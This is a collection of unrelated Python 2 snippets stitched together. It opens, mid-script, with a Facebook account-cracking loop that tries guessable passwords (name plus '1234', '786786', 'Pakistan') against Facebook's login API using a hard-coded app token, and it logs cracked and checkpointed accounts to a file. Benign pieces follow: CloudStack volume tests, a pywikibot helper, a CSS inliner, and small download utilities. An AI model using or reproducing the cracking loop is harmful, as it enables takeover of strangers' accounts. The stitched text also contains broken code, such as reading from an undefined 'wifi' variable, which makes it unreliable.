in q["error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' 👽 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass3 + "\n") cek.close() cekpoint.append(user + pass4) else: pass4 = b['first_name'] + '1234' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(wifi) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' 👽 ' + b[ 'name'] oks.append(user + pass4) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' 👽 ' + b[ 'name'] cek = open("out/CP.txt", "a") cek.write(user + "|" + pass4 + "\n") cek.close() cekpoint.append(user + pass4) else: pass5 = '786786' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' 👽 ' + b[ 'name'] oks.append(user + pass5) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' 👽 ' + b[ 'name'] cek = open( "out/CP.txt", "a") cek.write(user + "|" + pass5 + "\n") cek.close() cekpoint.append(user + pass5) else: pass6 = b[ 'last_name'] + '123' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(data) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' 👽 ' + b[ 'name'] oks.append(user + pass6) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' 👽 ' + b[ 'name'] cek = open( "out/CP.txt", "a") cek.write(user + "|" + pass6 + "\n") cek.close() cekpoint.append( user + pass6) else: pass7 = 'Pakistan' data = urllib.urlopen( "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6" ) q = json.load(wifi) if 'access_token' in q: print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' 👽 ' + b[ 'name'] oks.append( user + pass7) else: if 'www.facebook.com' in q[ "error_msg"]: print '\x1b[1;36;40m[CP] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' 👽 ' + b[ 'name'] cek = open( "out/CP.txt", "a") cek.write( user + "|" + pass7 + "\n") cek.close() cekpoint.append( user + pass7) except: pass
def test_02_negative_path(self): """ negative test for volume life cycle # 1. Deploy a vm [vm1] with shared storage and data disk #v1. Create VM2 with local storage offering disk offerings # 2.TBD # 3. Detach the data disk from VM1 and Download the volume # 4.TBD # 5. Attach volume with deviceid = 0 # 6. Attach volume, specify a VM which is destroyed # 7.TBD # 8.TBD # 9.TBD # 10.TBD # 11.Upload the volume from T3 by providing the URL of the downloaded volume, but specify a wrong format (not supported by the hypervisor) # 12.Upload the same volume from T4 by providing a wrong URL # 13.Upload volume, provide wrong checksum # 14.Upload a volume when maximum limit for the account is reached # 15.TBD # 16.Upload volume with all correct parameters (covered in positive test path) # 17.TBD # 18.TBD # 19.Now attach the volume with all correct parameters (covered in positive test path) # 20.Destroy and expunge all VMs """ # 1. Deploy a vm [vm1] with shared storage and data disk self.virtual_machine_1 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, diskofferingid=self.disk_offering_1.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_1.id) # List data volume for vm1 list_volume = Volume.list(self.userapiclient, virtualmachineid=self.virtual_machine_1.id, type='DATADISK') self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for vm id %s" % self.virtual_machine_1.id) list_data_volume_for_vm1 = list_volume[0] self.assertEqual( len(list_volume), 1, "There is no data disk attached to vm id:%s" % self.virtual_machine_1.id) self.assertEqual(list_data_volume_for_vm1.virtualmachineid, str(self.virtual_machine_1.id), "Check if volume state (attached) is reflected") # Variance if self.zone.localstorageenabled: # V1.Create vm3 with local storage offering self.virtual_machine_local_2 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_2.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_local_2.id) # 3. Detach the data disk from VM1 and Download the volume self.virtual_machine_1.detach_volume(self.userapiclient, volume=list_data_volume_for_vm1) verify_detach_volume(self, self.virtual_machine_1.id, list_data_volume_for_vm1.id) # download detached volume self.extract_volume = Volume.extract( self.userapiclient, volume_id=list_data_volume_for_vm1.id, zoneid=self.zone.id, mode='HTTP_DOWNLOAD') self.debug("extracted url is%s :" % self.extract_volume.url) try: formatted_url = urllib.unquote_plus(self.extract_volume.url) self.debug("Attempting to download volume at url %s" % formatted_url) response = urllib.urlopen(formatted_url) self.debug("response from volume url %s" % response.getcode()) fd, path = tempfile.mkstemp() self.debug("Saving volume %s to path %s" % (list_data_volume_for_vm1.id, path)) os.close(fd) with open(path, 'wb') as fd: fd.write(response.read()) self.debug("Saved volume successfully") except Exception: self.fail( "Extract Volume Failed with invalid URL %s (vol id: %s)" % (self.extract_volume, list_data_volume_for_vm1.id)) # 6. Attach volume, specify a VM which is destroyed self.virtual_machine_2 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_2.id) try: self.virtual_machine_2.delete(self.apiclient) except Exception as e: raise Exception("Vm deletion failed with error %s" % e) # Create a new volume self.volume = Volume.create(self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_data_volume = Volume.list(self.userapiclient, id=self.volume.id) self.assertEqual( validateList(list_data_volume)[0], PASS, "Check List volume response for volume %s" % self.volume.id) self.assertEqual( list_data_volume[0].id, self.volume.id, "check list volume response for volume id: %s" % self.volume.id) self.debug("volume id %s got created successfully" % list_data_volume[0].id) # try Attach volume to vm2 try: self.virtual_machine_2.attach_volume(self.userapiclient, self.volume) self.fail("Volume got attached to a destroyed vm ") except Exception: self.debug("Volume cant not be attached to a destroyed vm ") # 11.Upload the volume by providing the URL of the downloaded # volume, but specify a wrong format (not supported by the hypervisor) if "OVA" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "VHD" else: self.testdata["configurableData"]["upload_volume"][ "format"] = "OVA" try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"]) self.fail("Volume got uploaded with invalid format") except Exception as e: self.debug("upload volume failed due %s" % e) # 12. Upload the same volume from T4 by providing a wrong URL self.testdata["configurableData"]["upload_volume"]["format"] = "VHD" if "OVA" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "OVA" if "QCOW2" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "QCOW2" u1 = self.extract_volume.url.split('.') u1[-2] = "wrong" wrong_url = ".".join(u1) try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=wrong_url, services=self.testdata["configurableData"]["upload_volume"]) self.upload_response.wait_for_upload(self.userapiclient) self.fail("volume got uploaded with wrong url") except Exception as e: self.debug("upload volume failed due to %s" % e) # 13.Upload volume, provide wrong checksum try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"], checksome="123456") self.upload_response.wait_for_upload(self.userapiclient) self.fail("volume got uploaded with wrong checksome") except Exception as e: self.debug("upload volume failed due to %s" % e) # 14.Upload a volume when maximum limit for the account is reached account_update = Resources.updateLimit(self.apiclient, resourcetype=2, account=self.account.name, domainid=self.account.domainid, max=1) list_resource = Resources.list(self.apiclient, account=self.account.name, domainid=self.account.domainid, resourcetype=2) self.assertEqual( validateList(list_resource)[0], PASS, "Check List resource response for volume %s" % self.account.name) self.assertEqual( str(list_resource[0].max), '1', "check list List resource response for account id: %s" % self.account.name) self.debug("Max resources got updated successfully for account %s" % self.account.name) try: self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"]) self.upload_response.wait_for_upload(self.userapiclient) self.fail("volume got uploaded after account reached max limit for\ volumes ") except Exception as e: self.debug("upload volume failed due to %s" % e)
def test_01_positive_path(self): """ positive test for volume life cycle # 1. Deploy a vm [vm1] with shared storage and data disk # 2. Deploy a vm [vm2]with shared storage without data disk # 3. TBD # 4. Create a new volume and attache to vm2 # 5. Detach data disk from vm1 and download it # Variance(1-9) # 6. Upload volume by providing url of downloaded volume in step 5 # 7. Attach the volume to a different vm - vm2 # 8. Try to delete an attached volume # 9. Create template from root volume of VM1 # 10. Create new VM using the template created in step 9 # 11. Delete the template # 12. Detach the disk from VM2 and re-attach the disk to VM1 # 13.TBD # 14.TBD # 15.Migrate volume(detached) and then attach to a vm and live-migrate # 16.Upload volume of size smaller than storage.max.volume.upload.size(leaving the negative case) # 17.TBD # 18.TBD # 19.TBD # 20.Detach data disks from VM2 and delete volume """ # 1. Deploy a vm [vm1] with shared storage and data disk self.virtual_machine_1 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, diskofferingid=self.disk_offering_1.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_1.id) # List data volume for vm1 list_volume = Volume.list(self.userapiclient, virtualmachineid=self.virtual_machine_1.id, type='DATADISK') self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for vm id %s" % self.virtual_machine_1.id) list_data_volume_for_vm1 = list_volume[0] self.assertEqual( len(list_volume), 1, "There is no data disk attached to vm id:%s" % self.virtual_machine_1.id) self.assertEqual(list_data_volume_for_vm1.virtualmachineid, str(self.virtual_machine_1.id), "Check if volume state (attached) is reflected") # 2. Deploy a vm [vm2]with shared storage without data disk self.virtual_machine_2 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_2.id) # 4. Create a new volume and attache to vm2 self.volume = Volume.create(self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_data_volume = Volume.list(self.userapiclient, id=self.volume.id) self.assertEqual( validateList(list_data_volume)[0], PASS, "Check List volume response for volume %s" % self.volume.id) self.assertEqual( list_data_volume[0].id, self.volume.id, "check list volume response for volume id: %s" % self.volume.id) self.debug("volume id %s got created successfully" % list_data_volume[0].id) # Attach volume to vm2 self.virtual_machine_2.attach_volume(self.userapiclient, self.volume) verify_attach_volume(self, self.virtual_machine_2.id, self.volume.id) # Variance if self.zone.localstorageenabled: # V1.Create vm3 with local storage offering self.virtual_machine_local_3 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_2.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_local_3.id) # V2.create two data disk on local storage self.local_volumes = [] for i in range(2): local_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_local.id, zoneid=self.zone.id) list_local_data_volume = Volume.list(self.userapiclient, id=local_volume.id) self.assertEqual( validateList(list_local_data_volume)[0], PASS, "Check List volume response for volume %s" % local_volume.id) self.assertEqual( list_local_data_volume[0].id, local_volume.id, "check list volume response for volume id: %s" % local_volume.id) self.debug("volume id %s got created successfully" % list_local_data_volume[0].id) self.local_volumes.append(local_volume) # V3.Attach local disk to vm1 self.virtual_machine_1.attach_volume(self.userapiclient, self.local_volumes[0]) verify_attach_volume(self, self.virtual_machine_1.id, self.local_volumes[0].id) if self.list_storage: # V4.create vm4 with zone wide storage self.virtual_machine_zone_4 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.tagged_so.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_zone_4.id) # V5.Create two data disk on zone wide storage self.zone_volumes = [] for i in range(2): zone_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_tagged.id, zoneid=self.zone.id) list_zone_data_volume = Volume.list(self.userapiclient, id=zone_volume.id) self.assertEqual( validateList(list_zone_data_volume)[0], PASS, "Check List volume response for volume %s" % zone_volume.id) self.assertEqual( list_zone_data_volume[0].id, zone_volume.id, "check list volume response for volume id: %s" % zone_volume.id) self.debug("volume id:%s got created successfully" % list_zone_data_volume[0].id) self.zone_volumes.append(zone_volume) # V6.Attach data disk running on ZWPS to VM1 (root disk on shared) self.virtual_machine_1.attach_volume(self.userapiclient, self.zone_volumes[0]) verify_attach_volume(self, self.virtual_machine_1.id, self.zone_volumes[0].id) # V7. Create a cluster wide volume and attach to vm running on zone # wide storage self.cluster_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_cluster_volume = Volume.list(self.userapiclient, id=self.cluster_volume.id) self.assertEqual( validateList(list_cluster_volume)[0], PASS, "Check List volume response for volume %s" % self.cluster_volume.id) self.assertEqual( list_cluster_volume[0].id, str(self.cluster_volume.id), "volume does not exist %s" % self.cluster_volume.id) self.debug("volume id %s got created successfuly" % list_cluster_volume[0].id) self.virtual_machine_zone_4.attach_volume(self.userapiclient, self.cluster_volume) verify_attach_volume(self, self.virtual_machine_zone_4.id, self.cluster_volume.id) if self.list_storage and self.zone.localstorageenabled: # V8.Attach zone wide volume to vm running on local storage self.virtual_machine_local_3.attach_volume(self.userapiclient, self.zone_volumes[1]) verify_attach_volume(self, self.virtual_machine_local_3.id, self.zone_volumes[1].id) # V9.Attach local volume to a vm running on zone wide storage self.virtual_machine_zone_4.attach_volume(self.userapiclient, self.local_volumes[1]) verify_attach_volume(self, self.virtual_machine_zone_4.id, self.local_volumes[1].id) # 5. Detach data disk from vm1 and download it self.virtual_machine_1.detach_volume(self.userapiclient, volume=list_data_volume_for_vm1) verify_detach_volume(self, self.virtual_machine_1.id, list_data_volume_for_vm1.id) # download detached volume self.extract_volume = Volume.extract( self.userapiclient, volume_id=list_data_volume_for_vm1.id, zoneid=self.zone.id, mode='HTTP_DOWNLOAD') self.debug("extracted url is%s :" % self.extract_volume.url) try: formatted_url = urllib.unquote_plus(self.extract_volume.url) self.debug("Attempting to download volume at url %s" % formatted_url) response = urllib.urlopen(formatted_url) self.debug("response from volume url %s" % response.getcode()) fd, path = tempfile.mkstemp() self.debug("Saving volume %s to path %s" % (list_data_volume_for_vm1.id, path)) os.close(fd) with open(path, 'wb') as fd: fd.write(response.read()) self.debug("Saved volume successfully") except Exception: self.fail( "Extract Volume Failed with invalid URL %s (vol id: %s)" % (self.extract_volume, list_data_volume_for_vm1.id)) # checking format of downloaded volume and assigning to # testdata["volume_upload"] if "OVA" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "OVA" if "QCOW2" in self.extract_volume.url.upper(): self.testdata["configurableData"]["upload_volume"][ "format"] = "QCOW2" # 6. Upload volume by providing url of downloaded volume in step 5 self.upload_response = Volume.upload( self.userapiclient, zoneid=self.zone.id, url=self.extract_volume.url, services=self.testdata["configurableData"]["upload_volume"]) self.upload_response.wait_for_upload(self.userapiclient) self.debug("uploaded volume id is %s" % self.upload_response.id) # 7. Attach the volume to a different vm - vm2 self.virtual_machine_2.attach_volume(self.userapiclient, volume=self.upload_response) verify_attach_volume(self, self.virtual_machine_2.id, self.upload_response.id) # 8. Try to delete an attached volume try: self.volume.delete(self.userapiclient) self.fail("Volume got deleted in attached state %s " % self.volume.id) except Exception as e: self.debug("Attached volume deletion failed because %s" % e) # 9. Create template from root volume of VM1(stop VM->create template # -> start vm) self.virtual_machine_1.stop(self.userapiclient) self.list_root_disk_for_vm1 = Volume.list( self.userapiclient, virtualmachineid=self.virtual_machine_1.id, type='ROOT') self.assertEqual( validateList(self.list_root_disk_for_vm1)[0], PASS, "Check List volume response for vm %s" % self.virtual_machine_1.id) self.assertEqual( len(self.list_root_disk_for_vm1), 1, "list root disk for vm1 is empty : %s" % self.virtual_machine_1.id) self.template_from_vm1_root_disk = Template.create( self.userapiclient, self.testdata["template"], self.list_root_disk_for_vm1[0].id, account=self.account.name, domainid=self.account.domainid) list_template = Template.list( self.userapiclient, templatefilter=self.testdata["templatefilter"], id=self.template_from_vm1_root_disk.id) self.assertEqual( validateList(list_template)[0], PASS, "Check List template response for template id %s" % self.template_from_vm1_root_disk.id) self.assertEqual( len(list_template), 1, "list template response is empty for template id : %s" % list_template[0].id) self.assertEqual(list_template[0].id, self.template_from_vm1_root_disk.id, "list template id is not same as created template") self.debug("Template id:%s got created successfully" % self.template_from_vm1_root_disk.id) self.virtual_machine_1.start(self.userapiclient) # 10. Deploy a vm using template ,created from vm1's root disk self.virtual_machine_3 = VirtualMachine.create( self.userapiclient, self.testdata["small"], templateid=self.template_from_vm1_root_disk.id, accountid=self.account.name, domainid=self.account.domainid, serviceofferingid=self.service_offering_1.id, zoneid=self.zone.id, mode=self.testdata["mode"]) verify_vm(self, self.virtual_machine_3.id) # 11.delete the template created from root disk of vm1 try: self.template_from_vm1_root_disk.delete(self.userapiclient) self.debug("Template id: %s got deleted successfuly" % self.template_from_vm1_root_disk.id) except Exception as e: raise Exception("Template deletion failed with error %s" % e) list_template = Template.list( self.userapiclient, templatefilter=self.testdata["templatefilter"], id=self.template_from_vm1_root_disk.id) self.assertEqual( list_template, None, "Template is not deleted, id %s:" % self.template_from_vm1_root_disk.id) self.debug("Template id%s got deleted successfully" % self.template_from_vm1_root_disk.id) # List vm and check the state of vm verify_vm(self, self.virtual_machine_3.id) # 12.Detach the disk from VM2 and re-attach the disk to VM1 self.virtual_machine_2.detach_volume(self.userapiclient, volume=self.upload_response) verify_detach_volume(self, self.virtual_machine_2.id, self.upload_response.id) self.virtual_machine_1.attach_volume(self.userapiclient, volume=self.upload_response) verify_attach_volume(self, self.virtual_machine_1.id, self.upload_response.id) # 15.Migrate volume(detached) and then attach to a vm and live-migrate self.migrate_volume = Volume.create( self.userapiclient, services=self.testdata["volume"], diskofferingid=self.disk_offering_1.id, zoneid=self.zone.id) list_volume = Volume.list(self.apiclient, id=self.migrate_volume.id) self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for volume %s" % self.migrate_volume.id) self.assertEqual(list_volume[0].id, str(self.migrate_volume.id), "volume does not exist %s" % self.migrate_volume.id) self.debug("volume id %s got created successfuly" % list_volume[0].id) self.virtual_machine_1.attach_volume(self.userapiclient, self.migrate_volume) verify_attach_volume(self, self.virtual_machine_1.id, self.migrate_volume.id) self.virtual_machine_1.detach_volume(self.userapiclient, volume=self.migrate_volume) verify_detach_volume(self, self.virtual_machine_1.id, self.migrate_volume.id) list_volume = Volume.list(self.apiclient, id=self.migrate_volume.id) self.assertEqual( validateList(list_volume)[0], PASS, "Check List volume response for volume %s" % self.migrate_volume.id) self.assertEqual(list_volume[0].id, str(self.migrate_volume.id), "volume does not exist %s" % self.migrate_volume.id) self.debug("volume id %s got created successfuly" % list_volume[0].id) list_pool = StoragePool.list(self.apiclient, id=list_volume[0].storageid) self.assertEqual( validateList(list_pool)[0], PASS, "Check List pool response for storage id %s" % list_volume[0].storageid) self.assertGreater( len(list_pool), 0, "Check the list list storagepoolresponse for vm id: %s" % list_volume[0].storageid) list_pools = StoragePool.list(self.apiclient, scope=list_pool[0].scope) self.assertEqual( validateList(list_pools)[0], PASS, "Check List pool response for scope %s" % list_pool[0].scope) self.assertGreater( len(list_pools), 0, "Check the list vm response for scope :%s" % list_volume[0].scope) storagepoolid = None for i in range(len(list_pools)): if list_volume[0].storageid != list_pools[i].id: storagepoolid = list_pools[i].id break else: self.debug("No pool available for volume migration ") if storagepoolid is not None: try: volume_migrate = Volume.migrate( self.apiclient, storageid=storagepoolid, volumeid=self.migrate_volume.id) except Exception as e: raise Exception("Volume migration failed with error %s" % e) self.virtual_machine_2.attach_volume(self.userapiclient, self.migrate_volume) verify_attach_volume(self, self.virtual_machine_2.id, self.migrate_volume.id) pool_for_migration = StoragePool.listForMigration( self.apiclient, id=self.migrate_volume.id) self.assertEqual( validateList(pool_for_migration)[0], PASS, "Check list pool For Migration response for volume %s" % self.migrate_volume.id) self.assertGreater( len(pool_for_migration), 0, "Check the listForMigration response for volume :%s" % self.migrate_volume.id) try: volume_migrate = Volume.migrate( self.apiclient, storageid=pool_for_migration[0].id, volumeid=self.migrate_volume.id, livemigrate=True) except Exception as e: raise Exception("Volume migration failed with error %s" % e) else: try: self.migrate_volume.delete(self.userapiclient) self.debug("volume id:%s got deleted successfully " % self.migrate_volume.id) except Exception as e: raise Exception("Volume deletion failed with error %s" % e) # 16.Upload volume of size smaller than # storage.max.volume.upload.size(leaving the negative case) self.testdata["configurableData"]["upload_volume"]["format"] = "VHD" volume_upload = Volume.upload( self.userapiclient, self.testdata["configurableData"]["upload_volume"], zoneid=self.zone.id) volume_upload.wait_for_upload(self.userapiclient) self.debug("volume id :%s got uploaded successfully is " % volume_upload.id) # 20.Detach data disk from vm 2 and delete the volume self.virtual_machine_2.detach_volume(self.userapiclient, volume=self.volume) verify_detach_volume(self, self.virtual_machine_2.id, self.volume.id) try: self.volume.delete(self.userapiclient) self.debug("volume id:%s got deleted successfully " % self.volume.id) except Exception as e: raise Exception("Volume deletion failed with error %s" % e)
import urllib url = 'http://localhost/upload.php' filename = '/tmp/abc' # f = open(filename, 'rb') # filebody = f.read() # f.close() # data = {'name': 'file', 'upload_file': filebody} # data = {'upload_file': filebody} data = {'upload_file': open('/tmp/abc', 'rb')} web_site = urllib.urlopen(url,urllib.urlencode(data) ) print web_site.read()
#!/usr/bin/python import nltk from stripogram import html2text from urllib import urlopen import os from bs4 import BeautifulSoup #import urllib.request html_doc = """Some HTML code that you want to convert""" from bs4 import BeautifulSoup soup = BeautifulSoup(html_doc) print(soup.get_text()) os.system('exit') url = "https://downloads.chef.io/chef-server/stable" html = urlopen(url).read() raw=nltk.clean_html(html) #text = html2text(raw) #print text processText(url)
def getCommonshelperCats(imagepage): ''' Get category suggestions from CommonSense. Parse them and return a list of suggestions. ''' commonshelperCats = [] usage = [] galleries = [] global search_wikis global hint_wiki site = imagepage.site() lang = site.language() family = site.family.name if lang==u'commons' and family==u'commons': parameters = urllib.urlencode({'i' : imagepage.titleWithoutNamespace().encode('utf-8'), 'r' : 'on', 'go-clean' : 'Find+Categories', 'p' : search_wikis, 'cl' : hint_wiki}) elif family==u'wikipedia': parameters = urllib.urlencode({'i' : imagepage.titleWithoutNamespace().encode('utf-8'), 'r' : 'on', 'go-move' : 'Find+Categories', 'p' : search_wikis, 'cl' : hint_wiki, 'w' : lang}) else: #Cant handle other sites atm return ([], [], []) commonsenseRe = re.compile('^#COMMONSENSE(.*)#USAGE(\s)+\((?P<usagenum>(\d)+)\)\s(?P<usage>(.*))\s#KEYWORDS(\s)+\((?P<keywords>(\d)+)\)(.*)#CATEGORIES(\s)+\((?P<catnum>(\d)+)\)\s(?P<cats>(.*))\s#GALLERIES(\s)+\((?P<galnum>(\d)+)\)\s(?P<gals>(.*))\s(.*)#EOF$', re.MULTILINE + re.DOTALL) gotInfo = False matches = None maxtries = 10 tries = 0 while(not gotInfo): try: if ( tries < maxtries ): tries = tries + 1 commonsHelperPage = urllib.urlopen( "http://toolserver.org/~daniel/WikiSense/CommonSense.php?%s" % parameters) matches = commonsenseRe.search( commonsHelperPage.read().decode('utf-8')) gotInfo = True else: break except IOError: pywikibot.output(u'Got an IOError, let\'s try again') except socket.timeout: pywikibot.output(u'Got a timeout, let\'s try again') if (matches and gotInfo): if (matches.group('usagenum') > 0): used = matches.group('usage').splitlines() for use in used: usage= usage + getUsage(use) #pywikibot.output(use) if (matches.group('catnum') > 0): cats = matches.group('cats').splitlines() for cat in cats: commonshelperCats.append(cat.replace('_',' ')) pywikibot.output(u'category : ' + cat) if (matches.group('galnum') > 0): gals = matches.group('gals').splitlines() for gal in gals: galleries.append(gal.replace('_',' ')) pywikibot.output(u'gallery : ' + gal) commonshelperCats = list(set(commonshelperCats)) galleries = list(set(galleries)) for (lang, project, article) in usage: pywikibot.output(lang + project + article) return (commonshelperCats, usage, galleries)
def perform(self,document,sourceHTML,sourceURL,srcPrefix): aggregateCSS=""; if len(srcPrefix) and not srcPrefix.endswith('/'): srcPrefix = srcPrefix + '/' # retrieve CSS rel links from html pasted and aggregate into one string CSSRelSelector = CSSSelector("link[rel=stylesheet],link[rel=StyleSheet],link[rel=STYLESHEET]") matching = CSSRelSelector.evaluate(document) for element in matching: try: csspath=element.get("href") if len(sourceURL): if element.get("href").lower().find("http://",0) < 0: parsedUrl=urlparse.urlparse(sourceURL); csspath=urlparse.urljoin(parsedUrl.scheme+"://"+parsedUrl.hostname, csspath) f=urllib.urlopen(csspath) aggregateCSS+=''.join(f.read()) element.getparent().remove(element) except: raise IOError('The stylesheet '+element.get("href")+' could not be found') #include inline style elements print aggregateCSS CSSStyleSelector = CSSSelector("style,Style") matching = CSSStyleSelector.evaluate(document) for element in matching: aggregateCSS+=element.text element.getparent().remove(element) #convert document to a style dictionary compatible with etree styledict = self.getView(document, aggregateCSS) #set inline style attribute if not one of the elements not worth styling ignoreList=['html','head','title','meta','link','script','repeater','singleline','multiline','br','layout'] for element, style in styledict.items(): if element.tag not in ignoreList: v = style.getCssText(separator=u'') element.set('style', v) #convert tree back to plain text html self.convertedHTML = etree.tostring(document, method="xml", pretty_print=True,encoding='UTF-8') self.convertedHTML= self.convertedHTML.replace(' ', '') #tedious raw conversion of line breaks. # We've inline styled the CSS, now do the HTML src tags soup = BeautifulSoup(self.convertedHTML) for img in soup.find_all("img"): img['src'] = srcPrefix + img.get('src') # Now we would like to set width and min-width on all our tables for table in soup.find_all("table"): if table.get('width') is not None: width = table.get('width') if not width.endswith('%'): if table.get('style') is None: style = [] else: style = table.get('style').split(';') style = [x for x in style if x] style.append("min-width:" + width + "px") style.append("width:" + width + "px") table['style'] = ';'.join(style) # Might as well go ahead and throw a style tag in the head for iOS fixes if soup.html.head is None: soup.html.insert(0, soup.new_tag('head')) if soup.html.head.style is None: soup.html.head.append(soup.new_tag('style', type="text/css")) soup.html.head.style.append(""" a[href^="x-apple-data-detectors:"] { color: #000000; text-decoration: none; } a[href^="tel"], a[href^="sms"], a[href^="mailto"] { color: #000000; text-decoration: none; } """) for img in soup.find_all('img'): if 'spacer.gif' in img.get('src'): classes = img.get('class') if classes is not None: if 'w' in classes: img.parent['width'] = img.get('width') if 'h' in classes: img.parent['height'] = img.get('height') self.convertedHTML = str(soup) return self
def check_profanity(text): connection = urllib.urlopen("http://www.wdylike.appspot.com/?q="+text) print(connection.read()) connection.close()
def delete(self, accessToken): postUrl = "https://api.weixin.qq.com/cgi-bin/menu/delete?access_token=%s" % accessToken urlResp = urllib.urlopen(url=postUrl) print urlResp.read()
print "Processing date " + str(date) # make new directory try: os.makedirs(date) except OSError: if not os.path.isdir(date): raise links = d.get(date) # filter out null links links = filter(lambda x: x != 'NULL', links) # get images from URLs, then save to directory count=1 for link in links: print "processing link " + str(link) res = urllib.urlopen(link) filename = date + "-" + str(count) + ".jpg" fullfilename = os.path.join(date + "/", filename) out = open(fullfilename, "wb") out.write(res.read()) out.close() count = count + 1
